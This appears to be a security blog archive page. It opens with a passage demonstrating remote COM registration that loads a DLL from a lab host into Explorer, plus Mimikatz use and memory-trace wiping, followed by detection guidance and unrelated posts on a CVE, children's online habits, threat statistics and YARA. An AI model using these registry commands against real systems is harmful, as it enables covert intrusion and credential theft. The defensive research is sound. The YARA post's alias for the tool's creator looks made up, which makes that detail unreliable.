Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}" /ve /t REG_SZ /d "ReadOnlyFileIconOverlayHandler" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /ve /t REG_SZ /d "mscoree.dll" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "Assembly" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler, Version=, Culture=neutral, PublicKeyToken=1aadad2b22ca8c0e" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "Class" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "RuntimeVersion" /t REG_SZ /d "v4.0.30319" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "ThreadingModel" /t REG_SZ /d "Both" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32" /v "CodeBase" /t REG_SZ /d "http://ts-dc1.enterprise.lab/ReadOnlyFileIconOverlayHandler.dll" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32\" /v "Assembly" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler, Version=, Culture=neutral, PublicKeyToken=1aadad2b22ca8c0e" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32\" /v "Class" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32\" /v "RuntimeVersion" /t REG_SZ /d "v4.0.30319" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\CLSID\{a259c04f-ffa8-310b-864c-fe602840399e}\InprocServer32\" /v "CodeBase" /t REG_SZ /d "http://ts-dc1.enterprise.lab/ReadOnlyFileIconOverlayHandler.dll" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler" /ve /t REG_SZ /d "ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Classes\ReadOnlyFileIconOverlayHandler.ReadOnlyFileIconOverlayHandler\CLSID" /ve /t REG_SZ /d "{A259C04F-FFA8-310B-864C-FE602840399E}" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ ReadOnlyFileIconOverlayHandler" /ve /t REG_SZ /d "{a259c04f-ffa8-310b-864c-fe602840399e}" /f
Reg.exe add "\\ts-user1.enterprise.lab\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved" /v "{a259c04f-ffa8-310b-864c-fe602840399e}" /t REG_SZ /d "ReadOnlyFileIconOverlayHandler" /f

Returning to the victim’s host (02:30), we emulate the user logon by restarting explorer.exe.

Now explorer.exe has .NET assemblies loaded, but there are still no suspicious artifacts inside the process, and there will be none until KatzAssembly is loaded and executed. Note the (for now) empty application domain spawned inside our target process.

At 03:50 we execute Mimikatz, which leaves detectable assemblies in memory.

Right after the Mimikatz operation finishes, we unload (04:18) the application domain spawned for this Mimikatz session, and the YARA scan shows that there are no longer any artifacts.

This practical example can be summarized in the mini diagram below. The idea is, unfortunately, rather easy to implement and very expensive to detect (memory scans cost performance, and assemblies would have to be scanned as they are being unloaded), but luckily it is very rarely seen in the wild.

Detection of CLR memory clearing

How do you detect CLR memory clearing? Keep an eye on how often application domains are unloaded. The default application domain is never unloaded, so every unload event means the process created a non-default domain and discarded it.

The figure shows the sequence of ETW events from the Microsoft-Windows-DotNETRuntime provider: application domain creation, assembly loading, and assembly and application domain unloading. You can log these with different tools, for example SilkETW (the Loader keyword, 0x8, is part of the 0x2008 mask used below).

SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2008 -ot file -p Loader.json

You can aggregate the events of application domain load and unload, and identify the process that most often loads and unloads application domains.

AMSI scans assemblies as they are loaded; it would also be useful to scan assembly memory and resources during unloading, though obviously only for detection, not prevention. Of course, this additional scanning would also cost performance.

Detection of COM activation of the CLR environment and remote assembly load

The trick of downloading remote code through a COM server activated in the Explorer process can be detected by monitoring the activation parameters (StartupMode and ComObjectGuid) in the RuntimeInformationStart event (event ID 187 of the Microsoft-Windows-DotNETRuntime provider).

In addition, monitor registry events that register a new COM server whose [HKEY_CLASSES_ROOT\CLSID\{GUID}\InprocServer32\CodeBase] value contains a URL, as well as the Explorer process loading assemblies from the .NET download cache, %LocalAppData%\assembly\dl3\([0-9A-Z]{8}.[0-9A-Z]{3}\\\){2}.*\Assemb.dll.
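An added example (not code from the article) that turns the two indicators above into triage rules in Python: a CodeBase value under any CLSID’s InprocServer32 that points at a network location, and explorer.exe mapping an assembly out of the download cache. The event dictionaries and their field names (TargetObject and Details for registry value writes, Image and ImageLoaded for image loads, modelled on Sysmon events 13 and 7), the versioned 1.0.0.0 subkey, the benign vendor CLSID and the cache directory names are all constructed for the example.

```python
"""Triage rules for COM-activated CLR remote loading:
(1) a CLSID registration whose InprocServer32\\CodeBase points at a remote
    location (HTTP/HTTPS/FTP URL, UNC path or file:// with a host), and
(2) explorer.exe loading an assembly from %LocalAppData%\\assembly\\dl3.

Assumption: events arrive as Sysmon-style dicts; all samples are constructed."""
import re
from urllib.parse import urlsplit

# ...\CLSID\{GUID}\InprocServer32[\<version>]\CodeBase (RegAsm also writes a
# versioned subkey, so one optional path component is allowed).
CODEBASE_VALUE = re.compile(
    r"\\CLSID\\\{[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}\}\\InprocServer32(\\[^\\]+)?\\CodeBase$",
    re.IGNORECASE)

# Download-cache layout: dl3\XXXXXXXX.XXX\XXXXXXXX.XXX\...\<assembly>.dll
DL3_CACHE = re.compile(
    r"\\AppData\\Local\\assembly\\dl3\\([0-9A-Z]{8}\.[0-9A-Z]{3}\\){2}.*\.dll$",
    re.IGNORECASE)

REMOTE_SCHEMES = {"http", "https", "ftp"}


def is_remote_codebase(value):
    """True when a CodeBase value resolves to something fetched over the network."""
    v = value.strip()
    if v.startswith("\\\\"):          # bare UNC path
        return True
    parts = urlsplit(v)
    scheme = parts.scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return True
    # file://host/share/x.dll is remote; file:///C:/x.dll (empty netloc) is local
    return scheme == "file" and bool(parts.netloc)


def check_registry_event(ev):
    """Alert when a remote CodeBase is written for any CLSID."""
    if CODEBASE_VALUE.search(ev["TargetObject"]) and is_remote_codebase(ev["Details"]):
        return f"remote CodeBase registered: {ev['TargetObject']} -> {ev['Details']}"
    return None


def check_image_load(ev):
    """Alert when explorer.exe maps an assembly out of the download cache."""
    if ev["Image"].lower().endswith("\\explorer.exe") and DL3_CACHE.search(ev["ImageLoaded"]):
        return f"explorer.exe loaded cached remote assembly: {ev['ImageLoaded']}"
    return None


def triage(registry_events, image_loads):
    """Run both rules and return the list of alert strings."""
    alerts = []
    for ev in registry_events:
        hit = check_registry_event(ev)
        if hit:
            alerts.append(hit)
    for ev in image_loads:
        hit = check_image_load(ev)
        if hit:
            alerts.append(hit)
    return alerts


# Constructed samples (not captured telemetry)
REGISTRY_EVENTS = [
    {"TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{A259C04F-FFA8-310B-864C-FE602840399E}\InprocServer32\CodeBase",
     "Details": "http://ts-dc1.enterprise.lab/ReadOnlyFileIconOverlayHandler.dll"},
    {"TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{A259C04F-FFA8-310B-864C-FE602840399E}\InprocServer32\1.0.0.0\CodeBase",
     "Details": "file://ts-dc1.enterprise.lab/share/ReadOnlyFileIconOverlayHandler.dll"},
    {"TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32\CodeBase",
     "Details": "file:///C:/Program Files/Vendor/Vendor.Shell.dll"},   # local: benign RegAsm /codebase
]
IMAGE_LOADS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Users\user1\AppData\Local\assembly\dl3\K5Y3QM7N.8RL\Q2WPT4BN.1XH\a259c04f\00f0e1d2_c3b4d701\ReadOnlyFileIconOverlayHandler.dll"},
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll"},
]

if __name__ == "__main__":
    for alert in triage(REGISTRY_EVENTS, IMAGE_LOADS):
        print(alert)
```

The local file:/// case is deliberately left unflagged: RegAsm /codebase writes exactly that form for legitimately installed shell extensions, and alerting on it would drown the signal.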

Useful links
September 16, 2021

Exploitation of the CVE-2021-40444 vulnerability in MSHTML


Last week, Microsoft reported the remote code execution vulnerability CVE-2021-40444 in the MSHTML browser engine. According to the company, this vulnerability has already been used in targeted attacks against Microsoft Office users. To exploit it, attackers create a document containing a specially crafted object; if a user opens the document, MS Office downloads and executes a malicious script.
According to our data, the same attacks are still happening all over the world. We are currently seeing attempts to exploit CVE-2021-40444 targeting companies in the research and development sector, the energy sector and large industrial sectors, the banking and medical technology development sectors, as well as telecommunications and the IT sector. Due to its ease of exploitation and the handful of published proof-of-concept (PoC) exploits, we expect to see an increase in attacks using this vulnerability.

Geography of CVE-2021-40444 exploitation attempts

Kaspersky is aware of targeted attacks using CVE-2021-40444, and our products protect against attacks leveraging the vulnerability. Possible detection names are:

  • HEUR:Exploit.MSOffice.CVE-2021-40444.a
  • HEUR:Trojan.MSOffice.Agent.gen
  • PDM:Exploit.Win32.Generic

Killchain generated by KEDR during execution of CVE-2021-40444 Proof-of-Concept

Experts at Kaspersky are monitoring the situation closely and improving mechanisms to detect this vulnerability using the Behavior Detection and Exploit Prevention components. Within our Managed Detection and Response service, our SOC experts are able to detect when this vulnerability is exploited, investigate such attacks and notify customers.

Technical details

The remote code execution vulnerability CVE-2021-40444 was found in MSHTML, the Internet Explorer browser engine, which is a component of modern Windows systems, both client and server editions. Moreover, the engine is often used by other programs to work with web content (e.g. MS Word or MS PowerPoint).
To exploit the vulnerability, attackers embed in a Microsoft Office document a special object containing a URL for a malicious script. If a victim opens the document, Microsoft Office downloads the malicious script from the URL and runs it using the MSHTML engine. The script can then use ActiveX controls to perform malicious actions on the victim’s computer. For example, the original zero-day exploit used in targeted attacks at the time of detection used ActiveX controls to download and execute a Cobalt Strike payload. We are currently seeing various types of malware, mostly backdoors, delivered by exploiting CVE-2021-40444.

Mitigations

IoC



September 16, 2021

Summer 2021: Friday Night Funkin’, Måneskin and pop it

This summer, several events that were postponed from 2020 due to the pandemic took place. Some of them interested children, while others barely registered with them. It is worth noting that children’s hobbies typically do not change from winter to summer; the only difference is that they devote more time to them during the summer vacation. In line with their usual habits, in summer 2021 children spent time watching their favorite YouTube bloggers, playing games, watching cartoons and listening to music. All that changed was the specific things they watched and played. In this article we will tell you more about what was popular with children this summer.

How we collect our statistics

Website categorization

Kaspersky Safe Kids, included in our home solutions, scans the contents of web pages that children try to visit. If the site falls into one of 14 undesirable categories, the product sends an alert to Kaspersky Security Network. In doing so, no personal data is transmitted and user privacy is not violated. We will note two important points:

  • It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. However, anonymous statistics are collected for all the 14 categories.
  • The information in this report was obtained from computers running Windows and macOS.

Web filtering in Kaspersky Safe Kids currently covers the following categories:

Search query filtering

Looking at children’s search activity is the best way to see what they are interested in. Kaspersky Safe Kids can filter kids’ queries in five search engines (Bing, Google, Mail.ru, Yahoo!, Yandex), as well as on YouTube. Filtering targets six potentially dangerous topics: Adult content, Alcohol, Narcotics, Tobacco, Racism and Profanity.

This report presents statistics on YouTube searches. The TOP 1000 search queries collected from YouTube over the period from June to August 2021, inclusive, was taken as 100%. The ranking was based on the number of times a query was input, without breakdown by region or language. The popularity of a topic is determined by its share of related queries.

We divided the search queries we collected from June through August 2021 into several subject categories:

  • Educational content
  • Toys
  • Sports
  • TikTok
  • Memes
  • Hobbies and creation
  • Trends (popular challenges, etc.)
  • Gacha Life
  • Movies, cartoons and TV shows
  • Music
  • YouTube bloggers
  • Computer games
  • Miscellaneous

Control the use of programs

Kaspersky Safe Kids allows parents to control and limit the amount of time their children spend on apps and programs on their devices. This study draws on anonymized data on the number of hours children in the world spent on apps on Android devices.

We determined the TOP 10 apps worldwide and took the total number of hours spent on them as 100%. The percentage breakdown within the TOP 10 reflects the number of hours spent on each app.

Kids’ interests overview

Kaspersky Safe Kids alerts distribution by category, June through August 2021 (download)

This summer, children most often used computers running Windows and macOS to watch videos and listen to music. Nearly half of all visits to websites from desktop computers were in the “Software, audio, video” category (44.92%). In second place was “Internet communication” (18.09%). “Online stores, banks, payment systems” rounded out the three most popular categories (16.04%). Interestingly, in a recent article about children’s interests in 2020 and 2021, we found that the third most popular category was “Videogames”, with “Online stores” closely behind, but this summer it slipped to fourth place (15.26%). The rise in popularity of e-commerce is not surprising: during the pandemic over the last year and a half, people have been turning more to online shopping, and children have been part of this trend.

“News media” was the fifth most popular category (3.54%). We cannot discuss this category without mentioning the Tokyo Olympics and the UEFA European Football Championship, which both took place this summer. Global media outlets closely followed these major sporting events. However, contrary to expectations, children did not pay more attention to them than to any other news during the year.

Android apps

The list of the 10 Android apps that children all over the world used most actively this summer completes the picture of this generation’s interests.

TOP 10 most popular Android apps, June through August 2021 (download)

Children spent the most time on the YouTube app: 32.95% of the total number of hours they spent on the TOP 10 apps. TikTok was second. At its inception, TikTok seemed like a fad that would dwindle away, but its popularity continues to grow. Between November 2020 and April 2021, it was the third most visited app: children spent 14.96% of their time on it. Now, however, it sits solidly in second place, accounting for 19.34% of the total time children spent on the 10 most popular apps, noticeably surpassing Instagram (5.15%), which is steadily losing ground among this age group. WhatsApp rounded out the top three apps, at 16.43%. Another mobile social network, Snapchat, came in last place in the TOP 10, at 2.24%.

Children spent nearly the same amount of time on the popular mobile games Brawl Stars (6.47%) and Roblox (6.46%). The mobile version of Minecraft was eighth, with 2.71%.

Children spent 5.91% of their time in the Google Chrome Browser and 2.34% of their time watching TV shows on Netflix.

Comparing the popularity of the YouTube app and websites in the “Software, audio, video” category — which youtube.com also belongs to — suggests that the YouTube service dominates the battle for children’s attention. Therefore, analyzing the anonymized data on what children searched for on YouTube will offer a clear picture of what captivated them this summer.

YouTube search queries

Children’s YouTube searches distribution by subject category, June through August 2021 (download)

The most frequently searched topic, representing 32.25% of searches, was computer games. We will examine these searches in greater detail below. The second most common category, at 18.43%, was queries about various bloggers, who cover a range of content from challenges to lifestyle. The most popular blogger over the summer was SSSniperWolf: children all over the world most frequently searched for her. The third largest search category was artists, music videos and tracks, at 18.37%. Search queries about movies, TV shows and cartoons represented 12.88% of the total. Gacha Life, which we wrote about in detail in our annual report, accounted for 5.35% of searches. Various trends represented 3.62% of searches. Among these was the Body Switch Challenge, a summer hit in which people temporarily swap places and pretend to be each other.

Computer games

The most frequently recurring search queries on YouTube related to computer games. Of the 1,000 most popular searches by children around the world during summer 2021, 32.25% were about computer games. What exactly were children interested in?

Most popular YouTube searches related to computer games, June through August 2021 (download)

Children most often — 44.29% of all gaming-related queries — searched for the channels of their favorite game bloggers. Among the bloggers children most often searched for were the English-speaking Let’s Players SSundee and MrBeast Gaming, the German-speaking Paluten and the Russian-speaking EdisonPts.

The second most common category of searches, at 25.86%, was all things Minecraft. The most popular search term in this category was “minecraft.” English-speaking children also often searched for the Minecraft Let’s Player Dream, while Russian-speaking children searched for the blogger Compot.

Children also performed searches for popular games such as Fortnite (5.31%) and Brawl Stars (4.93%) — which they especially gravitated to in the last year — as well as a tried-and-true favorite, Roblox (4.55%).

This summer children were particularly drawn to the rhythm game Friday Night Funkin’ (2.61%), making it worth discussing separately. The game involves pressing specific keys in time with the music. Among Us, which was once a wildly popular game, slipped in the rankings: it represented only 1.01% of searches — by comparison, this figure was 3.80% between November 2020 and April 2021.

Screenshot from the game Friday Night Funkin’

Two game consoles — Sony PlayStation and Nintendo Switch — made the list of TOP 1000 search queries by children. There were more searches related to Nintendo than to PlayStation: 1.11% versus 0.16%.

The other searches in this category related to games we felt did not merit separate discussion. This summer, the most popular of these were Just Dance, Five Nights at Freddy’s and Apex Legends.


Children are traditionally also interested in musical content. This summer, Music represented 18.37% of the TOP 1000 YouTube searches. In line with overall recent trends, TikTok continued to influence children’s musical preferences as they most often searched for music that went viral thanks to this social network.

The summer’s most popular track was Masked Wolf’s “Astronaut in the Ocean.” The most popular artists were Ariana Grande and Lil Nas X. Morgenshtern was the decisive favorite of Russian-speaking children.

In late May 2021, the long-awaited Eurovision Song Contest was finally held. Eurovision was canceled last year due to the pandemic, but it was already apparent that TikTok helped some of the songs from the competition go viral. This happened, for example, with the track by Little Big, which was supposed to represent Russia. This year we saw that children and adolescents were in fact interested in Eurovision. During the summer, the winner, the Italian group Måneskin, was one of the most popular artists among children and adolescents around the world. They most frequently searched YouTube for the group’s tracks “Beggin’,” “I Wanna Be Your Slave” and of course, the winning Eurovision song, “Zitti e Buoni.”

Movies, cartoons and TV shows

Distribution of YouTube search queries in Movies, cartoons and TV shows category (download)

In addition to watching their favorite bloggers and music videos, this past summer children spent time watching cartoons and TV shows, and they searched for trailers of upcoming movies. This topic accounted for 12.88% of YouTube search queries. The most popular content in this category was cartoons (46.16%), with children all over the world most often searching for “Peppa Pig” and “Ladybug & Cat Noir.”

Along with cartoons, children sought out a variety of TV and YouTube shows (26.65%), including Dance Moms and Inside Edition in English, and Eralash and What Was Next (a YouTube comedy show) in Russian.

Children were also interested in anime this summer: searches for it represented 20.20% of queries. The most popular anime series among children is still “Naruto.”

Based on the number of searches, children are most eagerly anticipating the films “Spider-Man: No Way Home,” which will be released in December 2021, and “Venom: Let There Be Carnage,” which is slated for release in October.


Eurovision was not the only 2020 event that was postponed due to the pandemic. Two major sporting events were also rescheduled for this summer: the 2020 UEFA European Football Championship and the Tokyo Olympics. There was no uptick in children’s interest in these events. Sports accounted for only 0.88% of YouTube searches, which is just slightly higher than the figure for the period from November 2020 to April 2021, when the topic accounted for 0.68% of searches.

Although toys were the subject of only 0.82% of searches, children across the world had a clear favorite this summer: the pop it and simple dimple antistress toys. Songs about these toys immediately went viral on TikTok, and YouTube was inundated with reviews of them. Just as a few years ago children everywhere were obsessed with the spinner — remember that one? — this summer they went crazy for pop it.


As we have noted, children’s habits and interest in certain types of content tend not to change. However, the content itself does change. The game Friday Night Funkin’ is gradually overtaking Among Us in popularity. Pop it has supplanted the long-forgotten spinner, while the Eurovision winners knocked the K-pop groups BTS and BlackPink off their pedestal as the most popular groups among children. At the same time, there are topics that children have been gravitating to for years: the games Minecraft and Roblox, the singer Ariana Grande and YouTube videos. Nor is this the first year that the social network TikTok has been on top, and children are spending ever more time watching short videos on it.

This summer also showed that children are more keen on music than sports. The younger generation was much more absorbed by Eurovision than the Olympics or Euro 2020.

To cultivate trusting relationships with your children, it is important to be up to date on what they are interested in now, give them gifts that reflect their interests and talk about topics that excite them. In this report we have discussed anonymized statistics that show the big picture, but you can use parental controls to find out what makes your child happiest: the plush character from the game Among Us, pop it or, say, breaking out the candy and having a Eurovision family watch party.

September 13, 2021

Incident response analyst report 2020

 Download full report (PDF)

The Incident response analyst report provides insights into incident investigation services conducted by Kaspersky in 2020. We deliver a range of services to help organizations when they are in need: incident response, digital forensics and malware analysis. Data in the report comes from our daily practices with organizations seeking assistance with full-blown incident response or complementary expert activities for their internal incident response teams.

In 2020, the pandemic forced companies to restructure their information security practices, accommodating a work-from-home (WFH) approach. Although key trends in terms of threats have stayed the same, our service approach moved to a near-complete – 97% of all cases – remote delivery.

Geography of incident responses by region, 2020

Most of the incident handling requests were received from the CIS (27.8%), European Union (24.7%) and Middle East (22.7%) regions. In 2020, organizations seeking our assistance represented a wide spectrum of sectors: industry, finance, government, telecoms, transportation and healthcare.

Share of incident responses by vertical and industry, 2020

Industrial businesses were the most affected by cyberattacks (22%), followed by government institutions (19%). Most of our responses were ransomware-related: in 32.7% of true positive cases, the incident involved encrypted files.

Overall, the Incident response analyst report 2020 contains four chapters:

  • Reasons to go for incident response
    Where the cause of an incident could be established before the impact, most incidents can be confidently classified as ransomware. This threat is overtaking money theft and other impacts as a more convenient monetization scheme with much broader industry coverage (not just finance).
  • Initial vectors, or how attackers got in
    Security issues with passwords, software vulnerabilities and social engineering combined into an overwhelming majority of initial access vectors during attacks.
  • Tools and exploits
    Almost half of all incident cases included the use of built-in OS tools (LOLBins), well-known offensive tools from GitHub (e.g. Mimikatz, AdFind, Masscan) and specialized commercial frameworks (Cobalt Strike).
  • Attack duration
    We grouped all incident cases into three categories with different attacker dwell times, incident response duration, initial access, and impact from the attack.

To learn more on these topics, please read the full report (English, PDF).

September 9, 2021

Threat landscape for industrial automation systems in H1 2021

The H1 2021 ICS threat report at a glance

Percentage of ICS computers attacked
  1. During the first half of 2021 (H1 2021), the percentage of attacked ICS computers was 8%, which was 0.4 percentage points (p.p.) higher than that for H2 2020.

    Percentage of ICS computers on which malicious objects were blocked (download)

    Numbers per country varied from 58.4% in Algeria to 6.8% in Israel.

    Top 15 countries and territories with the largest percentages of ICS computers on which malicious objects were blocked in H1 2021 (download)

    Top 10 countries and territories with the lowest percentages of ICS computers on which malicious objects were blocked in H1 2021 (download)

    When we look at regional numbers, Africa led with 46.1%, followed by Southeast Asia at 44.1%, East Asia at 43.1% and Central Asia at 42.1%.

    Percentage of ICS computers on which malicious objects were blocked, by region (download)

  2. The largest increases in the percentage of attacked ICS computers during H1 2021 were as follows:
    • Over 10 p.p. in Belarus (50.4%) and Ukraine (33.1%);
    • 4 p.p. in the Czech Republic (20.2%) and Slovakia (24.3%);
    • 5 p.p. in Hong Kong (20.8%);
    • 6 p.p. in Australia (23%) and Cameroon (45.2%).

    The internet was the main source of threats causing these increases.

  3. The percentage of ICS computers on which threats were blocked decreased in all monitored industries. This was especially noticeable in the oil and gas (36.5%) and building automation (40.3%) sectors (-7.5 p.p. and -6.3 p.p., respectively).

Percentage of ICS computers on which malicious objects were blocked in selected industries (download)

Major threat sources

The internet, removable media and email continue to be the main sources of threats to computers in ICS environments.

Percentage of ICS computers on which malicious objects from various sources were blocked (download)

  1. Threats from the internet were blocked on 18.2% of ICS computers (+1.5 p.p.).

    In H1 2021, the largest increases in this indicator were observed in Belarus (+12.2 p.p.), Ukraine (+8 p.p.) and Russia (+6.7 p.p.).

    Russia led the regional rankings with 27.6%.

    Percentage of ICS computers on which malicious objects from the internet were blocked, by region (download)

    Belarus led the country rankings with 32.8%.

    Top 15 countries and territories with the highest percentages of ICS computers on which internet threats were blocked in H1 2021 (download)

  2. Threats arriving via removable media were blocked on 5.2% of ICS computers (-0.2 p.p.), continuing a downward trend that began in H2 2019.
    Africa led noticeably in the regional rankings with 15.6%. In H1 2021, the percentage of ICS computers on which threats were blocked when removable media were connected decreased in Asian regions.

    Regions ranked by percentage of ICS computers on which malware was blocked when removable media was connected in H1 2021 (download)

    Algeria led among individual countries with 24%.

    Fifteen countries and territories with the largest percentage of ICS computers on which malware was blocked when removable media was connected in H1 2021 (download)

  3. Malicious email attachments were blocked on 3.4% of ICS computers (-0.6 p.p.).
    Southern Europe ranked the highest with 6.4%. The only region where the percentage increased was Australia and New Zealand (+1.3 p.p.).

    Regions ranked by percentage of ICS computers on which malicious email attachments were blocked in H1 2021 (download)

    Bangladesh led among individual countries with 8.8%.

    Top 15 countries with the highest percentages of ICS computers on which malicious email attachments were blocked in H1 2021 (download)

The variety of malware detected

In H1 2021, Kaspersky security solutions blocked more than 20.1 thousand malware variants from 5,150 families in ICS environments.

  1. Denylisted internet resources were the main threat source and were blocked on 14% of ICS computers.
    Threat actors place malicious scripts on various media resources and sites hosting pirated content. These scripts redirect users to websites that spread spyware and/or cryptocurrency miners. The percentage of computers on which this type of threat was blocked has grown since 2020.
  2. Malicious scripts and redirects (JS and HTML) were blocked on 8.8% of ICS computers (+0.7 p.p.).
    Australia and New Zealand (+3.8 p.p.), as well as Russia (+4.4 p.p.), saw noticeable growth in the percentage of computers on which malicious scripts used for downloading spyware were blocked.
  3. Spyware (backdoors, trojan spies and keyloggers) was blocked on 7.4% of ICS computers (+0.4 p.p.).
    This figure was highest in East Asia (14.3%), Africa (13.4%) and Southeast Asia (11.2%).
  4. Ransomware was blocked on 0.40% of ICS computers (-0.1 p.p.).
    This figure was highest in East Asia with 0.82%.

    In the Middle East, we saw an increase in the percentage of computers on which worms (+0.4 p.p.) and ransomware (+0.3 p.p.) were blocked.

    Percentage of ICS computers on which malicious objects from various categories were blocked (download)

The full report is available on the Kaspersky ICS CERT website.

September 3, 2021

Applied YARA training Q&A


On August 31, 2021 we ran a joint webinar between VirusTotal and Kaspersky, with a focus on YARA rules best practices and real world examples. If you didn’t have the chance to watch the webinar live, you can see it as a recording on Brighttalk: Applied YARA training.

During the webinar we received an overwhelming response and we would like to thank all the participants for sharing their thoughts, questions and ideas; most of all, we are happy to see so much interest and enthusiasm for YARA!

During the 90 minutes of the webinar we only had the chance to answer a fraction of the questions we received. We would still like to answer the remaining ones, since we think many of them are quite relevant to real-world situations and practices and could be useful to other security practitioners. Even better, for the trickier questions we decided to ask for help from the creator of YARA himself, Victor Manuel Alvarez (aka Hector Manuel Velasquez), who will help answer them. If you have further questions, please feel free to send them to us in the comments section. We will be happy to answer them too!

Stay safe, stay secure and Happy hunting!

Costin, Vicente and Victor


Q: How difficult is it writing a YARA rule for obfuscated payloads?
Q: What file features normally you experts often look into when it comes to obfuscated files? How can YARA help?
Q: What would be your tip / best practices for writing rules to catch obfuscated binaries?

Vicente here. Obfuscated files are tricky, but YARA can still be useful. We can use all the metadata and file geometry for the detection. Also, depending on where the obfuscation is, maybe we can also use some portions of the code for the detection; for instance, if it only obfuscates strings with some custom method, maybe the code used for obfuscation can be useful.

Costin here. In general, it is a lot more difficult to write YARA rules for obfuscated payloads. Depending on the obfuscation method, one can still find some ways to detect them. For example, assuming a specific cryptor or packer was used, you can still write a rule for the packer (e.g. UPX) or rely on an unpacking engine to give you the plain code. Some platforms, such as VirusTotal, would automatically unpack known tools for you, which allows one to write simple YARA rules for the unpacked code. When the obfuscation is polymorphic, for instance when the code is expanded with dummy instructions and operands are split across several operations, one can try to use other file properties, such as metadata, entropy, import hashes or other data which stays constant across different generations. In short, there is no rule on how to write rules for obfuscated code, but in some cases it is possible.

Q: Would hashes used for API hashing, for example, be helpful for a YARA rule? Since this can change in a future campaign, I’m in doubt.

Costin here. Absolutely — API hashing can be super useful for detection of malware, especially when there are very few unique strings that can be used in the rule, or, when the malware is otherwise obfuscated. YARA actually provides a nice easy to use solution — the PE module implements the standard Mandiant import hash function as pe.imphash(). This can be used in a YARA rule condition such as:

Q: Are you trying rules against a set of malware before releasing it?

Costin here. Yes, extensive QA of a YARA rule is critical for us before releasing it publicly or to customers. For this purpose, we use several internal databases, of both malicious files and known clean code. To make sure the YARA rule detects more than just one sample, we try to run it against our entire malware collection, which is over five petabytes at the moment. Sometimes, when time is essential, we run it on a subset of the malware collection, such as specific PE files received during the last 12 months, or, say, script files. In many cases, testing a rule on clean files is even more important than testing it on malware! Based on our experience, we’ve seen countless instances of YARA rules that were published by security companies or even governmental agencies which produced false positives when used on a real system. To simplify testing of YARA rules, you can either use VirusTotal’s Retrohunt feature, or set up a test of your own collections using our open source KLARA project.

Q: Won’t typos also restrict the YARA rule to a particular sample or samples distributed under one campaign?

Vicente here. That could happen, but maybe the typos are difficult to replace. For example, sometimes typos are in the commands that the malware receives from the server, which would need a redeployment of server and client side malware from the attacker. In some other cases attackers get fully unaware of the typo, maybe because they are not familiar with the language and just use a weird expression that no native speaker would use, and can stay there forever. We can find these typos everywhere, including metadata, comments, etc.

Q: Where are good sources for large amounts of known good clean data?

Costin here. There are several public, free good sources of known good clean data. Some have suggested the NIST reference set, however, you can also build your own from things like a Windows installation, Linux install, Android/iOS dumps and the like. It’s important to also have third party software, such as Chrome, Firefox or Adobe Reader. A lot of false positives produced by publicly available YARA rules occur on software such as the ones above!

Q: How useful are YARA Rule Generators like Florian Roth’s yarGen?

Vicente here. YARA rule generators are VERY useful, but we do not recommend using raw generated rules without an extra round of manual polishing. We believe it is more useful to use it for a first round to extract potentially relevant strings from a collection of samples we are analyzing, and from here use these results to help us build more refined rules.

Q: Is it better to use wide, wide ASCII, both, or none?

Costin here. Using wide, ASCII or both (or none) is decided on a case-by-case basis. Depending on how a malware piece is compiled, the strings you see inside could be ASCII (single byte) or wide (double byte, Unicode). YARA allows you to easily search for UTF-16 strings through the wide modifier. By default, ASCII is used every time you assign a string to a variable, however, if you want to search both, you need to use “ascii wide”. Adding “wide” to the ASCII strings you are searching for might find you additional stuff.

